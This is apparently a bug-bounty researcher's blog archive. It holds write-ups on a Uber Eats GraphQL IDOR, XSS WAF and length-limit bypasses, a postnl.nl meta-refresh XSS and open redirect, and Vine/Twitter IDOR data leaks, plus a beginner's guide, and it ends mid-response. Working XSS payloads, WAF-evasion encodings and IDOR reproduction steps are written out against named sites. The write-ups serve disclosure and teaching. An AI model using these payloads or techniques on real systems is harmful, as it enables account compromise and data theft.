Categories
Bug Bounty

IDOR Leads To Leak Any Uber Eats Restaurant Analytics

Hi fellow Hackers,
At first Ramadan Kareem! Wishing everyone a very happy Ramadan. Today I will write about an Insecure direct object references (IDOR) vulnerability that I recently discovered in Uber Eats Restaurant.

The Uber Eats Restaurant web application at https://restaurant.uber.com/ is using GraphQL. Back in March, I was doing a collaboration on a Uber report with Sifat Bhai. On that engagement, he discovered an IDOR in GraphQL that leaks data of other Restaurants but that leaked data was not giving any sensitive information to make a report on it. So I decided to take a look at that functionality.

Issue Background: In the Uber Eats for Restaurant dashboard, there is an Analytics option where store owners can see Restaurant Analytics of the last 12 months. Analytics endpoint looks https://restaurant.uber.com/v2/home/{locationUUIDs}/analytics/sales where multiple GraphQL requests pullup all data and parse it in that webpage to a readable view. Now I noticed all those requests contain locationUUIDs parameter like "locationUUIDs":["0292a209-df33-496b-b65b-192c86603d48"]} where 0292a209-df33-496b-b65b-192c86603d48 is my own test account locationUUIDs value. When I changed the locationUUIDs value to another account locationUUIDs value it responded the same with some JSON data in the body that took my attention. But still response body data is not helpful as it is not properly readable and in order to read the data we need to parse it through the webpage.

Automation with Burp: To do the data parsing job I used Burp Suite Tool’s Match and Replace option.

  1. In Burp go to Proxy => Options => Match and Replace
  2. Click on Add and set up a rule like the below screenshot where Match value is my own restaurant’s locationUUIDs and Replace value is any other restaurant’s locationUUIDs.

    Match-and-Replace

  3. I also added a rule like the below screenshot to change the currency from BDT to USD to get all analytics in USD currency.Currency Match and Replace

Final Exploit

  1. Visit https://restaurant.uber.com and log in using a valid restaurant account username and password and do proper authentication.
  2. Now setup Burp Suite Tools with that browser and keep Intercept OFF
  3. Visit https://restaurant.uber.com/v2/home/{victims_locationUUIDs}/analytics/sales
  4. All request of the browser will go through Burp & Match and Replace rule will replace all locationUUIDs parameter value and all data will parse into a readable view on that webpage.Sales dataSales by Item

Impact

An attacker can access all analytics of a restaurant what includes actions

  • Choose a date range to see that date range analytics.
  • Orders analytics view and Clicking on Download will Download a CSV copy.
  • Track orders placed over time to monitor a restaurant’s popularity.
  • Track ticket size over time to see if a restaurant’s receiving larger orders.
  • Learn when a target store tends to generate most of its sales.
  • Learn when customers tend to place the most orders in a target restaurant.
  • Learn when customers tend to place the largest orders in a target restaurant.
  • See which items are a restaurant’s top sellers.

To exploit a stored attacker just needs the locationUUIDs parameter value and I showed the Uber Security team a promising way to fuzz the value for any restaurant. This vulnerability was reported in report #1116387 under Uber Bug Bounty Program and $2,000 Bounty was Rewarded. Check out the video POC too.

Hope you guys enjoyed this one. 

#Stay_Home
#Stay_Safe
#Wash_Your_Hand_Frequently
#Hack_The_Planet🔥

Categories
Bug Bounty

How to Get Into Bug Bounties – Part 01

A common question nowadays is “How to get started in Bug Bounties?” and I keep on getting this message on a day to day basis. It’s not possible for me to respond to each and every message, so I thought I’d rather do a blog post and would direct all those beginners to this blog post.

I am a learner in Hacking Stuff and I’ve been in the bug bounty field for 3+ years now. still, there is so much to learn each and every day, I’m yet not an expert and this post is for mainly those peoples who are an absolute beginner, or someone who is thinking to get started into bug bounty, or someone who is planning to change their field.

What are Bug Bounties?

A bug bounty program is a deal offered by many websites, organizations, and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities. These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse. Bug bounty programs have been implemented by a large number of organizations, including Facebook, Google, Twitter, Microsoft, Uber, Github, Internet bug bounty, and many more. Companies outside the technology industry, including traditionally conservative organizations like the United States Department of Defense, have started using bug bounty programs hosted on HackerOne.

Formal Education vs Information Security

I’ve seen a lot of guys think someone needs to be from a computer science background to be good in Hacking kinds of stuff. But this is not correct. I am too from a Power Engineering background but I am very much interested in the information security field from school time but joined the Power Engineering field with the advice of family members but my main focus has always been Information security.

Being from a computer science background helps but it is not compulsory but you have to learn the computer science fundamentals yourself. So, If you are from a non-technical background you should get started only if you’re more interested in learning about information security not ONLY interested in $$$.

Keep in mind

  • No one will be able to tell you everything about this field, It’s a long path but you have to travel it alone with help from others.
  • Do not expect someone will spoon feed you everything.
  • Focus less on $ and more on learning.
  • If you think you will become successful overnight or over the week or a month, this is not a field you should join.
  • Doing bug bounties are very competitive nowadays, it took me more than six months to find my first valid vulnerability, so be patient and practice every day.

Basic Technical things to get started

You must have a basic understanding of how things work on the internet. Learn how things work before getting started into Bug bounty hunting so you don’t have to ask random people why a payload isn’t working. There are many things you have to learn but I cannot list all of them here. I’m listing a few important topics and you should learn more by yourself.

  • HTTP/HTTPS: HTTP is a communication protocol that was designed for communication between web browsers and web servers. From this deception, you should understand how important it is. You should go through the below resources to get the basic idea about HTTP Protocols, HTTP Requests, Response, Status Codes, Encoding/Decoding, SOP, Cookie, MIEM & HTML Pharising what will definitely help you later.
  • Basic Networking: A basic understanding of networking is important for anyone who’s into a computer. I enrolled Certified Network Security Specialist and I personally found it really helpful for me. I can suggest the below resources to learn the basics of Networking.
  • Programming/Coding: To be a Good Hacker you don’t really need to be a Good Programmer but it’s always good to cover the basic level so that you understand what’s happening there after looking at a chunk of codes. If you understand the code Sometimes It increases your chances of successfully identifying and exploiting a vulnerability and also you may need code to escalate a bug with a low/medium severity to high/critical. Back in 2016 when I was just learning XSS vulnerability and I don’t have good knowledge of programming and all I used to do is just copy-paste XSS payloads in user inputs without understanding a thing and the fun fact is I used to test with below payloads without understanding that all those were the same and I was just wasting my time 😷
    <img src=x onerror="alert(document.domain)">
    <IMG SRC=A onerror="alert(document.domain)">
    <IMG SRC=B onerror="alert(document.domain)">
    <IMG SRC=b onerror="alert(document.domain)">
    <IMG SRC=# onerror="alert(document.domain)">
    <IMG SRC=x onerror="alert(document.domain)">
    <IMG SRC=y onerror="alert(document.domain)">
    <IMG SRC=Z onerror="alert(document.domain)">

    After reading my story hope you guys understand how basic knowledge in coding can save your time and give you more advantages in the future with automation and exploration. I’ll suggest a few languages that one should properly have basic to medium level knowledge about and keep advancing it.

HTML:

  1. https://www.w3schools.com/html/
  2. https://www.codecademy.com/learn/learn-html
  3. https://htmldog.com/guides/html/advanced/

PHP:

  1. https://www.w3schools.com/php/
  2. https://www.codecademy.com/learn/learn-php
  3. https://www.guru99.com/php-tutorials.html
  4. https://www.codecademy.com/learn/paths/web-development

JavaScript:

  1. https://www.w3schools.com/js/
  2. https://www.youtube.com/watch?v=PkZNo7MFNFg
  3. https://www.codecademy.com/learn/introduction-to-javascript

SQL(Structured Query Language):

  1. https://www.youtube.com/watch?v=HXV3zeQKqGY
  2. https://www.w3schools.com/sql/
  3. https://www.codecademy.com/learn/learn-sql

Automation: "Never send a human to do a machine’s job". Knowledge in the below languages will help you to automate your tasks easily. Knowledge in these languages will help you to code your own tools and understand many other common tools and modify them according to your needs.

Bash:

  1. https://0xprial.com/wp-content/uploads/2021/02/bash-bug-bounty.pdf
  2. https://0xprial.com/wp-content/uploads/2021/02/Coding-For-Pentester.pdf
  3. https://www.tutorialspoint.com/unix/shell_scripting.htm
  4. https://www.learnshell.org/
  5. https://medium.com/quick-code/top-tutorials-to-learn-shell-scripting-on-linux-platform-c250f375e0e5

Ruby:

  1. https://www.learnrubyonline.org/
  2. https://www.codecademy.com/learn/learn-ruby

Python:

  1. https://realpython.com/
  2. https://www.amazon.com/Python-Web-Penetration-Testing-Cookbook-ebook/dp/B00YSILC2K
  3. https://docs.python.org/3/tutorial/

Golang:

  1. https://tour.golang.org/welcome/1
  2. https://www.udemy.com/learn-go-the-complete-bootcamp-course-golang/

Chose a Path to learn

Now it’s time to learn about vulnerabilities. In a Bug Bounty program, you may encounter different types of assets testing like

  1. Source Code
  2. IoT
  3. Hardware
  4. Reverse Engineering
  5. Host
  6. Mobile Application
  7. Web Application

You have to choose one of them to start learning. Most of the guys choose the Web application asset first because it’s the easiest one.

Learning about Vulnerabilities

One vulnerability at a time. Look at OWASP’s Top 10 vulnerabilities and pick one vulnerability then master it. Create your own local sandbox environment and test for that type of vulnerability. Play with the application and try to find out why it is vulnerable. Then look for it everywhere on the internet [Test with proper permission or responsible disclosure policy]. While learning for a vulnerability keep the below points in mind

  • How to test for that vulnerability and identify it?
  • How to bypass WAF and other common defenses?
  • How a fixed/secured application endpoint looks or reacts like?

Let’s me show you guys my way of learning new things, let’s start with XSS vulnerabilities. Whenever I try to learn new things in infosec I first ask google as “Google is your friend”. So I will just search using the below dorks and open all results in new tabs and read them all and try to figure out how those were discovered and how those vulnerabilities were tested.

  • XSS site:hackerone.com
  • XSS site:medium.com
  • XSS POC site:youtube.com

Then I will test what I learned on my localhost. I was able to find below codes that I used when I was practicing XSS back in 2016.

<?php 

        $val=htmlspecialchars($_GET['no_xss'],ENT_QUOTES);
        $val2=$_GET['xss']; 
        $val3=htmlspecialchars($_GET['r_xss'],ENT_QUOTES);
?>

<html>
<body>
    <center>
            <h1>
            Injection Point 1 :- <?=$val2?><br>
            Injection Point 2 :- <?=$val?><br>
            <a href="<?=$val3?>">Tricky XSS :')</a>
            </h1>
    </center>
</body>
</html>

There are many other vulnerable apps available. You can use them to gain practical experience on a vulnerability. Some of them are:

  1. DVWA
  2. bWAPP
  3. OWASP WebGoat

CTFs are not always great for learning:

  1. Real targets are never going to be as vulnerable as a CTF is.
  2. The more you rely on learning from them the harder the jump is to real targets.
  3. Although the experience will help you in Bug Bounty but the transition is never going to be easy.

Learning new stuff while testing:

While you are testing for a specific vulnerability type you may encounter something fishy. For example, you discover a graphQL endpoint but you don’t know much about that. So would you ignore that? No! note that endpoint, stop testing then

  1. Go to google and learn about that technology and then came back to that endpoint to test for vulnerabilities.
  2. If that didn’t work setup that technology or application in sandbox and test there for gaining experience.

Bug Bounties Learning new stuffs while testing
Learning new stuff while testing

Read other Researchers write-ups and disclosed reports

Regularly read other researcher’s writeups to understand their methodology and learn about how they approach vulnerabilities. I will suggest starting with InfoSec Write-ups what contains a huge amount of POC write-ups for many researchers. Also regularly keep eye on Hackerone’s Hacktivity. Reading other researchers write-ups and Hackerone disclosed reports allows you to

  • Learn about other hackers thinking and what they found.
  • Understand other researchers thinking and testing process.
  • How they are approaching a vulnerability.
  • How they tested for that vulnerability.

Reconnaissance

Recon is a set of processes and techniques (Footprinting, Scanning & Enumeration) used to covertly discover and collect information about a target system. During reconnaissance, an Ethical Hacker attempts to gather as much information about a target system as possible. For recon, I will suggest reading Dirty-Recon.pdf 

Should you rely on automated tools?

As a beginner, you should avoid automated tools unless you know what and how that tool is working,

  • Don’t rely on tools, except for a proxy.
  • Use tools only when you understand how and why they work.

Which targets should you choose as a beginner?

As a beginner, you should avoid the bounty program and give those efforts to VDP programs to earn reputation points, Hall Of Fames, and swags. You will also earn experience with it. Focus less on $$$ and more on learning, test programs with VDP, or independent sites that offer Hall Of Fame or Swags. There are lots of queries you could search for such a program on google, however here are some popular search queries: (don’t forget to try different languages!)

inurl:responsible disclosure
inurl:security site:target.com 
"report security vulnerability"
"vulnerability disclosure"
"powered by hackerone" "submit vulnerability report"
indesc:bug bounty|vulnerability disclosure
inurl: bug bounty
white hat program
"vulnerability reporting policy"
inurl:responsible-disclosure-policy

Pick a program you love and hunt there for a long time.

Writing a Decent Vulnerability Report 

In BugBounty Writing a well-explained Report is the most important part. If you don’t write a good and well-described report you may end up making confusion with the Triage team, what could result –

  • Less Payment than expected.
  • Report closed as N/A.
  • Will take more time to confirm the vulnerability by the Triage team.

On the other hand, if your report is well explained / clear and contains all the info then it will take less time to confirm the vulnerability and you will get your reward soon. Even you may get Bonus rewards for your creative and detailed report. I got many such rewards where that report should be closed as Won’t Fix or Out Of Scope. See a few example scenario below –

Scenario 1: In the below screenshot it was a vulnerability in Out Of Scope asset, but I showed them how it can lead to a good impact attack by writing a detailed report and they rewarded me $800 and appreciated my detailed report.

Scenario-1
Scenario-1

Scenario 2: In the below screenshot the company was an online Banking service and the vulnerability was using an expired/used password reset token of a user attacker can brute-force for login password which could lead to account takeover. But it was a vulnerability of the PHP framework and according to the policy, it will go under Not Accepted vulnerability. But for my detailed report, they paid a €50 bonus for a report what was Closed as Won’t fix.

Scenario-2
Scenario-2

From the Above Scenarios, you should understand that how much important it is to write a detailed and well-explained report. A vulnerability report should contain the below contents:

  1. Title
  2. Summary 
  3. Description
  4. Vulnerable Endpoint
  5. How You discovered it 
  6. How to reproduce
  7. Impact & Scenario
  8. Recommended Fix

Title: In a vulnerability title you have to give a title about the vulnerability you are going to report. For example, you discovered a Reflected XSS in the 0xPrial.com domain’s contact endpoint. So the title will be something like: Reflected XSS in 0xPrial.com domain’s contact endpoint.

Summary: In this section give a short summary of the vulnerability.

Description: In description give detailed information about the vulnerability. For example, if you are reporting an XSS in the contact form then describe how XSS is happening on that endpoint and how it’s working.

Vulnerable Endpoint: List down all the URLs/endpoints/assets that are vulnerable to that security issue.

How You discovered it: In this section describe how you discovered that endpoint and vulnerability, list all scripts or tools you used to do it here.

How to reproduce: This is the most important part of a report. In this step write down all the necessary steps to reproduce the issue you discovered step by step. So-that triage team can follow it and reproduce the issue. It will be easy to follow your steps by the triage team if you add screenshots with every step. Also, you can create a video POC and add it to your report. 

Impact & Scenario: Your bounty reward amount mostly depend on this section. In this section, you have to explain how an attacker can use that vulnerability to do something malicious against that organization. Describe what is the impact of your discovered vulnerability. What else you can do with this vulnerability, What an attacker can achieve using this vulnerability, How an attacker can attack another user using this etc. Also, add a real-life attack scenario in this section if possible to make the report more impactful.

Recommended Fix: Suggest a fix for that vulnerability. Dev team will push a fix according to suggestions and will ask you to retest again the fix.

Always keep the below points in mind while writing a report :

  • Never upload your POC screenshot/Video to a place where everyone can see it. But You can use youtube to upload your POC video but ask about uploading it to youtube from that organization’s security team + upload it as an Unlisted Video.
  • Never publicly disclose your report or vulnerability details before it’s fixed properly.
  • Before publicly disclosing a vulnerability take permission from the company.
  • If possible Use a public PGP key to encrypt your message while reporting.

Some write-ups on writing a quality report

Must read

  1. Web Hacking 101 [ Get a free copy from https://hackerone.com/resources/web-hacking-101 ]
  2. Resources for Beginner Bug Bounty Hunters 
  3. Web Application Hacker’s Handbook
  4. Mastering Modern Web Penetration Testing
  5. The Hacker Playbook 1, 2 and 3
  6. The Mobile Application Hacker’s Handbook
  7. Breaking into Information Security

Twitter # tag you should follow

  1. #bugbounty
  2. #bugbountytips
  3. #infosec

Blogs You should follow

There are plenty of blogs Shared by Hackers daily that you can read to learn more and more. [ Any Blog Link Missing? Kindly add it in Comments ]

YouTube Channels You should follow.

These Channels are Shared By Hackers where They Upload their Video POC’s. Watching them you can understand how to demonstrate these types of attacks. [ Any Channel Link Missing? Kindly add it in Comments ]

At last pro tips for asking questions

Thanks for reading. Is there anything I missed? Feel free to let me know on the comment or contact me on Facebook.

Categories
Bug Bounty

XSS WAF & Character limitation bypass like a boss

Hello fellow Hackers!
I am sitting in my room for the last 3 days due to the coronavirus outbreak worldwide and feeling really bored. So I thought why not do a write-up of what I promised really long ago 🤭. A few months back in My Tweet I shared a way to bypass XSS WAF & Character limitation what I found on a private bug bounty site. Today I will share more technical details about that bypass. Hope you guys will enjoy it 😇

Back in 2019 I was testing a web application that allows a user to create a photo album and upload photos in it and the interface looks like the below screenshot:

Application Interface 🤔
Application Interface 🤔

Also, there is an option to rename images when I click on Edit, So normally any researcher will test for XSS here as there is a way to change the photo name. So I changed the photo name to xsstest'">{{7*7}}

Then I noticed the following things –

  • There is 15 character limitation in that input so I was able to inject xsstest'">{{7*7 these characters.
  • All special characters were being escaped properly.
  • And at last, I was being redirected to /error.aspx?code=500 when I tried to load that album again due to WAF and I have to rename the image to xsstest then I was able to load the album again.

It looks like this input is well protected form XSS attacks. Then I start playing with other available options and connected Burp Suit tools with my browser and keep it open to capture all background requests in HTTP History. Then when I was going through HTTP History tab and one background request endpoint caught my attention what looks like https://subdomain.company.com/ajax/generateImageList.ashx?json={albums:[{“id":"","value":"on"}]}. This request was for album Slideshow option and that endpoint page source was:

<a href="https://image-link.com/image.jpg" title="xsstest" rel="lightbox">84**00000</a>

Look at the title attribute value what is our image name in that album. So again I renamed my picture name to xsstest’"> and again checked ajax/generateImageList.ashx page source and this time it was –

<a href="https://image-link.com/image.jpg" title="xsstest'">" rel="lightbox">84**00000</a>

So in this new generateImageList.ashx endpoint –

  • User’s input is not being escaped properly.
  • No WAF detection.

But we still have the 15 character limitation what makes this xss useless. The smallest xss payload we can think of for this scenario is "oncut="alert() Which will result a blank popup when we Press CTRL+X on Windows & COMMAND+X on OS X on keyboard:

<a href="https://image-link.com/image.jpg" title=""oncut="alert()" rel="lightbox">84**00000</a>

Blank Popup 😪
Blank Popup 😪

I tried all possible way to bypass this character limitation and was unable to do it. I stopped testing here and saved about this endpoint in my To do list note to take a look here when I again test this asset. After about seven months I again started testing this asset and again working on this endpoint. Now noticed that I can upload multiple photos on album and by selecting all photos of album the Slideshow option request endpoint changes to https://subdomain.company.com/ajax/generateAlbumImageList.ashx?json={albums:[{“id":"","value":"on"}]} and that page source is:

<a href="https://image-link.com/image.jpg" title="xsstest'">" rel="lightbox">84**00000</a><a href="https://image-link.com/image.jpg" title="xsstest'">" rel="lightbox">84**00001</a>

So now we have multiple injections here. So why not upload 5 pictures in the album and use My Tweet mentioned payload?
Payload :

  • 1st Injection: */</script><!--
  • 2nd Injection:*/.domain)/*xxx
  • 3rd Injection: */(document/*xx
  • 4th Injection: */prompt/*xxxxx
  • 5th Injection: "><script>/*xss

Page source after final injection become:

<a href="https://image-link.com/image.jpg" title=""><script>/*xss" rel="lightbox">84**00000</a><a href="https://image-link.com/image.jpg" title="*/prompt/*xxxxx" rel="lightbox">84**00001</a><a href="https://image-link.com/image.jpg" title="*/(document/*xx" rel="lightbox">84**00002</a><a href="https://image-link.com/image.jpg" title="*/.domain)/*xxx" rel="lightbox">84**00003</a><a href="https://image-link.com/image.jpg" title="*/</script><!--" rel="lightbox">84**00004</a>

Now visiting https://subdomain.company.com/ajax/generateAlbumImageList.ashx?json={albums:[{“id":"","value":"on"}]} will execute the payload we used-

Popup Boom 😎🔥
Popup Boom 😎🔥

Now you may have a question why I used x character multiple times in the 2nd to 5th payload? The answer is in album images are sorting based on the name length + When it was uploaded. So I used x character multiple times to make all image name length the same, so that when I upload images it sort based on image upload time.

Hope you guys enjoyed this one.

#Stay_Home
#Stay_Safe
#Wash_Your_Hand_Frequently
#Hack_The_Planet🔥

Categories
Bug Bounty

Unicode vs WAF — XSS WAF Bypass

Hi readers,
At 1st Eid Mubarak to all. May Allah bring you joy, happiness, peace, and prosperity on this blessed occasion. Wishing you and your family on this happy occasion of Eid! Eid Mubarak! So on this blessed occasion I thought let’s share one of my findings as an Eid bonus 😜 !
From the title, you may come to know this is a write-up about XSS WAF bypass using UNICODE. So let’s give you a small idea about the application I was testing. There was an option called Save for later what saves items in your account for later use. The request looks like this:

Target applications Save for later option request
Target applications Save for later option request

If a user is properly authenticated then this post request will save items in the user’s account for later use and if a user is not properly authenticated then it will just reflect with some values. So I was manually fuzzing around with parameters and noticed channel parameter value is being reflected in response body without proper escaping in both authenticated & unauthenticated scenarios. I send a request with a channel parameter value that looks like "channel":"xss\"><" and the response was:

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"
                     data-productid="<ID>" data-channel="xss"><" data-quantity="1"
                     data-isbundleitem="false" role="link" tabindex="0" aria-label="label">Move to cart</a>

Our inputted value is inside the <a> tag and we can escape out of it as quotes & less-than/greater-than sign is not being filtered properly. So I thought I have a lot of ways to do XSS here until I inputted "channel":"xss\"onclick=\"alert(1)" and the response was:

WAF ! WAF ! WAF !!! 🤕
WAF ! WAF ! WAF !!! 🤕

So there is a WAF in place. To bypass it I started fuzzing and the result was:

"channel":"xss\"onclick=\"alert(1)" ==> WAF
"channel":"xss\"xss=\"alert(1)" ==> WAF
"channel":"xss\"onclick=\"alert(1)" ==> WAF
"channel":"xss\"xss=\"xxx(1)" ==> No WAF

So I tried to create a tag instead of adding event attributes in <a> tag and I inputted "channel":"xss\"><xss>test" and the response was:

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"
                     data-productid="<ID>" data-channel="xss">test" data-quantity="1"
                     data-isbundleitem="false" role="link" tabindex="0" aria-label="label">Move to cart</a>

So it’s also removing what’s context looks like a tag. So we don’t have the advantage of creating a tag. So our only way is using event attributes in <a> tag by bypassing the WAF. So I tried to do a brute-force using html-event-attributes.txt by fuzzdb to see if any event is not being blocked by WAF and got nothing interesting. Then I thought about Unicode and inputted a random Unicode to see if it’s decoding in response or not and bingo it’s decoding Unicode to its original chars. So now I started playing with unicode+events again and the result was:

"channel":"xss\"\u003E\u003Cxss\u003Etest" ==> data-channel="xss"><xss>test"
"channel":"xss\"xss=\"co\u006efirm(domain)" ==> No WAF
"channel":"xss\"onc\u006Cick=\"co\u006efirm(domain)" ==> HTTP/1.1 403 Forbidden

So we got a new advantage and also a new problem here.

  • The advantage is we can now create HTML tags using Unicode.
  • The disadvantage is even after using Unicode we are getting a new error HTTP/1.1 403 Forbidden when we add an event onc\u006Cick.

So again I made a wordlist from html-event-attributes.txt + Unicode and I got onmous\u0045leave & ond\u0072ag events giving HTTP/1.1 200 OK and also we can create HTML tags . So I made my final payload

xss\"\u003E\u003Ch1  onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!--

And response body was:

<a class="link nc-text-regular nc-blue js-movetocart" data-giftitemid="<ID>" data-skuid="<ID>" data-itemnumber="<ID>"
                     data-productid="<ID>" data-channel="xss"><h1  onmouseleave=confirm(domain)>come to me</h1><br><!--" data-quantity="1"
                     data-isbundleitem="false" role="link" tabindex="0" aria-label="label">Move to cart</a>

POST based XSS For unauthenticated users
POST based XSS For unauthenticated users

Take mouse pointer in come to me and leave it & boom 😎🤗
Now as this is a POST Request and there is no CSRF protection In a place so I chained CSRF + XSS = P2 Stored XSS for authenticated users 😎

CSRF + XSS = P2 Stored XSS for authenticated users 😎
CSRF + XSS = P2 Stored XSS for authenticated users 😎

Thanks for reading. Take a look at my YouTube channel for some POC I shared.

Cheers 😋😉

Categories
Bug Bounty

XSS bypass using META tag in realestate.postnl.nl

Hi readers,
Today I will write about a XSS Vulnerability I reported to the postnl.nl bug bounty Program.

Reflected XSS

A reflected XSS (or also called a non-persistent XSS attack) is a specific type of XSS whose malicious script bounces off of another website to the victim’s browser. It is passed in the query, typically, in the URL. It makes exploitation as easy as tricking a user to click on a link.

Vulnerable Endpoint: http://realestate.postnl.nl/?Lang=

To test a normal Reflected XSS I Input "><xsstest> in the Lang parameter and in source it was reflected properly inside META tag like below :-

<meta name="language" content=""><xsstest>" />

Looks simple right ? Then wait a little :’) . Then I Inputted "><img src=x> and I got:

Forbidden Error WAF postnl
Forbidden Error WAF postnl

I tried with many HTML tags and I got 2 points here:

  • Any Valid HTML tag is not allowed.
  • I can create any attributes here.

So I googled for meta tag attributes and got:

meta tag attributes
meta tag attributes

The http-equiv attribute took my attention. Now I again google more about it and learned that "META tag has the http-equiv directive. This directive allows you to define the equivalent of an HTTP header in the HTML code. The http-equiv directive can take a value of refresh, which can be used to redirect a user to another page."

Then I input 0;http://evil.com"HTTP-EQUIV="refresh" and response was

<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />

And I got redirected to evil.com. So I have open redirection now. Now we can try for Data URI XSS. So I input 0;javascript:alert(1)"HTTP-EQUIV="refresh" and response was

Forbidden Error WAF postnl
Forbidden Error WAF postnl

This was again Triaged for the keyword javascript used in payload. So I used Base64 encoded payload 0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh" and response source was

<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />

And now when I visit http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22 I got XSS popup

XSS Popup in different origin from postnl
XSS Popup in different origin from postnl

I reported it to their Zerocopter report form. Then they deployed a Fix by blacklisting the data:text/html;base64 keyword like they have blacklisted JavaScript keyword

After the fix still I can do Open Redirect when a user visits: http://realestate.postnl.nl/?Lang=0%3Bhttp%3A%2f%2fevil.com%22HTTP-EQUIV%3D%22refresh%22 and confirmed with them again

PostNL open redirect
PostNL open redirect

They again Fixed the issue and listed My name on their Hall Of Fame page & also offered to send some goodies 😍

Goodies offer from PostNL
Goodies offer from PostNL

Thanks for reading.If you have any query ask me on Facebook

Categories
Bug Bounty

How I earned 5040$ from Twitter by showing a way to Harvest other users IP address

Hi guys,
This is one of my old finding adding to my blog. Recently I disclosed a POC on How I was able to get all vine user’s sensitive Information including Phone no/IP Address/Emails and Many more that was reported to Twitter and they patched it and rewarded me 7560$. Those who missed it you can get the Orginal Report Here.

Today I am going to disclose another Information Disclosure vulnerability that was reported by me to the Twitter Security team in their Bug Bounty Program in Hackerone and they Rewarded me with an amount of 5040$ for this report.

When I testing vine API Endpoints I noticed an Endpoint that uses in the Vine Repost mechanism have a Parameter Named "ipAddress" with some plain Number value Like: 2130706433. We all know Ip Addresses look like: 127.0.0.1, But the value of the "ipAddress" looks invalid. Then when I tried to search about it on google I came to know that the value is valid. Actually, it was Converted to IP Address to Long/Decimal format. So I used an Online Converter tool and was able to get the real Ip.

Vulnerable Endpoint: https://vine.co/api/timelines/users/<POST_ID>

Reproduce
  • To reproduce this issue victim User have to repost any vine in his timeline and a lot of vine users reposted many Vine post in their timeline.
  • So Copy a Reposted Vine POST_ID and place it in the Endpoint and visit it. Example: https://vine.co/api/timelines/users/1293308695089926144
  • Now when I visited the link I got a response like below (The sensitive contents were removed by the twitter security team)
    “repost”: { “username”: “██████”, “verified”: 0, “vanityUrls”: [], “created”: “█████”, “repostId”: ████████, “avatarUrl”: “██████”, “userId”: ████, “user”: { “username”: “█████████”, “verified”: 0, “vanityUrls”: [], “avatarUrl”: “█████████”, “userId”: ████, “private”: 0, “location”: █████████ }, “flags|platform_lo”: 1, “postId”: ███, “ipAddress”: 2130706433 , “flags|platform_hi”: 1 }
  • As you can see the ipAddress parameter value is converted now Just Use my give online tool to again convert it to valid ip address value .

I reported this issue on Jan 26th and they paid me 5040$ for reporting this on Feb 25th.

5040$ from Twitter
5040$ from Twitter

Thanks for reading. Happy Hunting.

Categories
Bug Bounty

Vine User’s Private information disclosure

What is Vine?

Vine was an American social networking short-form video hosting service where users could share six or seven second-long, looping video clips. It was founded in June 2012; American microblogging website Twitter acquired it in October 2012, well before its official release on January 24, 2013.

Today I will write about a Critical Insecure direct object references (IDOR) vulnerability that will lead to Information Disclosure which allowed me to get any Vine user’s sensitive information including Ip address/phone no/email.
I reported this bug to the Twitter Security team in their Bug Bounty Program in Hackerone and they Rewarded me with an amount of 7560$ for this report.

 7560$ reward from Twitter Vine

7560$ reward from Twitter

Vine has stated this vulnerability on their Vine blog Post and also Hackerone mentioned this vulnerability in HackerOne Zerodaily Newsletter.

Vulnerable Endpoint: https://vine.co/api/users/profiles/<User_Id>

When I was testing vine domains for something interesting. I noticed the Endpoint what response was giving my account all information. I thought this is normal as many sites have this type of endpoint that shows login user’s information. So again I thought let’s try to exploit this with CORS if it is miss-configured. But CORS Policy was in place. Then I changed the user-id value to a random number and I got shocked that someone else user information was in front of me. By changing the user_id value I was able to get all information about that vine user.

Reproduce
  • Choose any user to get his all information and collect his User_ID
  • Now place the User-ID in the https://vine.co/api/users/profiles/<User Id> endpoint and visit it.
  • You will get a response in the body.
    {“code”: “”, “data”: {“followerCount”: 16271364, “includePromoted”: 1, “captchaSucceeded”: 0, “recordComment”: null, “locale”: “iUS”, “shareUrl”: “https://vine.co/████████”, “hiddenPhoneNumber”: 0, “notPorn”: 0, “userId”: █████████, “private”: 0, “likeCount”: null, “commentCount”: null, “platforms”: [“android”, “ios”], “postCount”: null, “profileBackground”: “0x33ccbf”, “suspended”: null, “hiddenFacebook”: 0, “verifiedEmail”: 0, “explicitContent”: 0, “dmcaStrikeCount”: 0, “flaggedCount”: 7579, “verified”: 1, “loopCount”: 6132344784, “avatarUrl”: “http://v.cdn.vine.co/r/avatars/████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr”, “authoredPostCount”: 598, “review_result_illegal_review”: 0, “review_result_ok”: 0, “review”: null, “suspendedBy”: null, “twitterId”: ████████, “phoneNumber”: “██████████”, “location”: “Los Angeles California”, “notifyActivity”: 1, “facebookConnected”: 1, “explicitContentAdmin”: 0, “statsTags”: null, “hiddenEmail”: 0, “unflaggable”: 0, “username”: “████████”, “modified”: “2017–01–29T01:24:00.000000”, “userIdStr”: “████████”, “twitterIdStr”: “████████”, “vanityUrls”: [“kingbach”], “remixDisabled”: 0, “deleted”: null, “categories”: null, “released”: 0, “loopVelocity”: null, “strikeCounts”: [{“count”: 0, “strikeType”: “SEVERE_POLICY_VIOLATION”}, {“count”: 0, “strikeType”: “DMCA”}, {“count”: 0, “strikeType”: “SENSITIVE”}, {“count”: 0, “strikeType”: “POSSIBLY_ILLEGAL”}, {“count”: 0, “strikeType”: “GRAPHIC_NON_VIOLATING”}, {“count”: 0, “strikeType”: “ESC”}], “uploadHD”: 1, “verifiedPhoneNumber”: 1, “hiddenTwitter”: 0, “vineVerified”: 1, “notifyMessages”: 1, “needsPhoneVerification”: 0, “repostCount”: null, “twitterScreenname”: “██████”, “secondaryColor”: 